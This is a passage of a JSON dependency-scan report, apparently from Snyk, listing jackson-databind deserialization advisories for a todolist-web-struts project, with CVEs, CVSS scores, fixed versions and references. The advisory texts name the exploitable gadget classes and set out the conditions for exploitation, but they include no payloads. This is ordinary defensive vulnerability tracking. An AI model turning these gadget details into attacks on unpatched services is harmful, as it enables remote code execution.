leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10, 2.8.11.5, 2.6.7.3 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/d4983c740fec7d5576b207a8c30a63d3ea7443de)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2420)\n", + "epssDetails": null, + "identifiers": { + "CVE": [], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-09-16T14:43:42.115110Z", + "functions_new": [ + { + "version": [ + "[2.10.0.pr1,2.10.0.pr2)", + "[,2.9.10)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-09-16T14:37:38Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-09-16T14:37:37Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-06T13:58:32.899468Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-469674", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "bsmali4" + ], + "semver": { + "vulnerable": [ + "[2.9.0,2.9.10.1)", + "[2.7.0,2.8.11.5)", + "[,2.6.7.3)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.9.10.1", + "2.8.11.5", + "2.6.7.3" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.1)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/9593e16cf5a3d289a9c584f7123639655de9ddac", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2478", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:52:13.688214Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:53.988000Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:50.462784Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:52:13.688214Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:53.988000Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A Polymorphic Typing issue was discovered within `org.apache.commons.dbcp.datasources.SharedPoolDataSource` was not blocked. An attacker could leverage this gadget type to perform Remote Code Execution attacks through deserialization.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.1, 2.8.11.5, 2.6.7.3 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/9593e16cf5a3d289a9c584f7123639655de9ddac)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2478)\n", + "epssDetails": { + "percentile": "0.73908", + "probability": "0.00404", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-16942" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-mx7p-6679-8g3q" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-10-02T08:02:18.178548Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.1)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-10-01T17:43:33Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-10-02T17:43:33Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:53.988000Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-469676", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "bsmali4" + ], + "semver": { + "vulnerable": [ + "[2.9.0,2.9.10.1)", + "[2.7.0,2.8.11.5)", + "[,2.6.7.3)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.9.10.1", + "2.8.11.5", + "2.6.7.3" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.1)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/9593e16cf5a3d289a9c584f7123639655de9ddac", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2478", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:52:13.709990Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:54.024581Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:59.814203Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:52:13.709990Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:54.024581Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A Polymorphic Typing issue was discovered as `com.p6spy.engine.spy.P6DataSource` was not blocked. An attacker could leverage this gadget type to perform Remote Code Execution attacks through deserialization.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.1, 2.8.11.5, 2.6.7.3 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/9593e16cf5a3d289a9c584f7123639655de9ddac)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2478)\n", + "epssDetails": { + "percentile": "0.73908", + "probability": "0.00404", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-16943" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-fmmc-742q-jg75" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-10-02T08:03:39.391997Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.1)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-10-01T17:43:33Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-10-02T17:43:33Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.024581Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-471943", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.9.10)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.9.10" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/191a4cdf87b56d2ddddb77edd895ee756b7f75eb", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/compare/jackson-databind-2.9.9.3...jackson-databind-2.9.10", + "title": "GitHub Comparison" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2460", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:47:59.172828Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:54.064844Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:56:04.701685Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:59.172828Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:54.064844Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A Polymorphic Typing issue was discovered related to `net.sf.ehcache.hibernate.EhcacheJtaTransactionManagerLookup`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/191a4cdf87b56d2ddddb77edd895ee756b7f75eb)\n- [GitHub Comparison](https://github.com/FasterXML/jackson-databind/compare/jackson-databind-2.9.9.3...jackson-databind-2.9.10)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2460)\n", + "epssDetails": { + "percentile": "0.85119", + "probability": "0.01174", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-17267" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-f3j5-rmmp-3fc5" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-10-07T10:05:31.629572Z", + "functions_new": [ + { + "version": [ + "[,2.9.10)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-10-07T01:14:26Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-10-07T01:14:26Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.064844Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-472980", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Zhangxianhui" + ], + "semver": { + "vulnerable": [ + "[2.0.0, 2.9.10.1)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.9.10.1" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.0.0, 2.9.10.1)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Blog Post" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/commit/b5a304a98590b6bb766134f9261e6566dcbbb6d0", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2498", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:52:13.712421Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:53.918541Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:58.282653Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:52:13.712421Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:53.918541Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. When Default Typing is enabled for an externally exposed JSON endpoint and the service has the apache-log4j-extra (version 1.2.x) jar in the classpath, and an attacker can provide a JNDI service to access, it is possible to make the service execute a malicious payload.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.1 or higher.\n## References\n- [Blog Post](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/b5a304a98590b6bb766134f9261e6566dcbbb6d0)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2498)\n", + "epssDetails": { + "percentile": "0.80301", + "probability": "0.00690", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-17531" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-gjmw-vf9h-g25v" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-10-13T07:40:03.046000Z", + "functions_new": [ + { + "version": [ + "[2.0.0, 2.9.10.1)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-10-12T21:52:10Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-10-13T07:41:55Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:53.918541Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-540500", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "UltramanGaia" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.2)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.9.10.2" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": 